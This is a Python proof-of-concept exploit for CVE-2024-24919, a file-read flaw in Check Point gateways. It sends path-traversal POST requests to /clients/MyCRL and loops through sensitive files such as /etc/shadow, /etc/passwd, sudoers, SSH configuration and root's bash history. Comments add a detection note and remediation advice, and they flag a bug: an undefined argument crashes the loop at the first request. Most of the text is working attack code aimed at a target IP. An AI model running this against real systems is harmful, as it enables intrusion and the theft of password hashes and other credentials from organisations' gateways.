# <author> H3key
# <Exploit LFI Check Point> CVE-2024-24919
# <str> critical paths
import requests
from argparse import ArgumentParser
from urllib3.exceptions import InsecureRequestWarning
# Suppress urllib3's InsecureRequestWarning: exploit() below posts with
# verify=False, i.e. without TLS certificate validation, and this call keeps
# the resulting warning off the console.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def exploit(ip, path, command=None):
    """Request *path* from the host *ip* via the CVE-2024-24919 file-read flaw.

    Sends one HTTPS POST to ``/clients/MyCRL`` whose body is the literal
    prefix ``aCSHELL/`` followed by a run of ``../`` segments and then *path*.

    Args:
        ip: Host (address or name) placed in the URL and in the Host header.
        path: Absolute file path appended after the traversal prefix.
        command: Accepted but never read by this function.

    Returns:
        The response body as text when the status code is 200, otherwise the
        string ``'Error: received status code <code>'``.

    Detection note: on the wire this is a POST to ``/clients/MyCRL`` with a
    body containing ``aCSHELL/`` and ``../`` sequences, so gateway or proxy
    logs showing requests of that shape deserve investigation. Remediation is
    the vendor's fix for CVE-2024-24919.
    """
    endpoint = f'https://{ip}/clients/MyCRL'
    body = f'aCSHELL/../../../../../../../../../../..{path}'

    # Content-Length is hard-coded to '48' whatever the body length is.
    request_headers = {
        'Host': f'{ip}',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0',
        'Te': 'trailers',
        'Dnt': '1',
        'Connection': 'keep-alive',
        'Content-Length': '48',
    }

    # verify=False: the server certificate is not validated.
    reply = requests.post(endpoint, headers=request_headers, data=body, verify=False)

    if reply.status_code != 200:
        return f'Error: received status code {reply.status_code}'
    return reply.text
if __name__ == '__main__':
    # Command-line entry point: takes the target via -i/--ip and walks a fixed
    # list of file paths, printing what exploit() returns for each one.
    parser = ArgumentParser(description='CVE-2024-24919 PoC')
    parser.add_argument('-i', '--ip', required=True, help='IP address of the target')
    args = parser.parse_args()

    # Files the script asks for. For defenders this list shows what should be
    # treated as disclosed on an affected, exposed gateway; /etc/shadow holds
    # password hashes, so credential rotation belongs in the response.
    # '/home/<username>/.bash_history' is sent literally; nothing in this
    # script substitutes the placeholder.
    critical_paths = [
        '/etc/passwd',
        '/etc/shadow',
        '/etc/hosts',
        '/etc/hostname',
        '/etc/network/interfaces',
        '/etc/resolv.conf',
        '/etc/ssh/sshd_config',
        '/var/log/syslog',
        '/var/log/auth.log',
        '/root/.bash_history',
        '/home/<username>/.bash_history',
        '/etc/sudoers',
        '/proc/cpuinfo',
        '/proc/meminfo',
        '/var/spool/cron/crontabs',
        '/etc/issue',
        '/etc/selinux/config',
        '/boot/grub/grub.cfg',
        '/etc/fstab',
        '/proc/version',
        '/etc/cron.d/root',
    ]

    try:
        for path in critical_paths:
            print(f'Attempting to read {path}')
            # NOTE(review): the parser above registers only -i/--ip, so
            # `args.command` does not exist; evaluating it raises
            # AttributeError, which the handler below does not catch.
            output = exploit(args.ip, path, args.command)
            print(f'Result for {path}:\n{output}\n')
    except (EOFError, KeyboardInterrupt):
        # End of input or Ctrl-C: stop with a non-zero exit status.
        exit(1)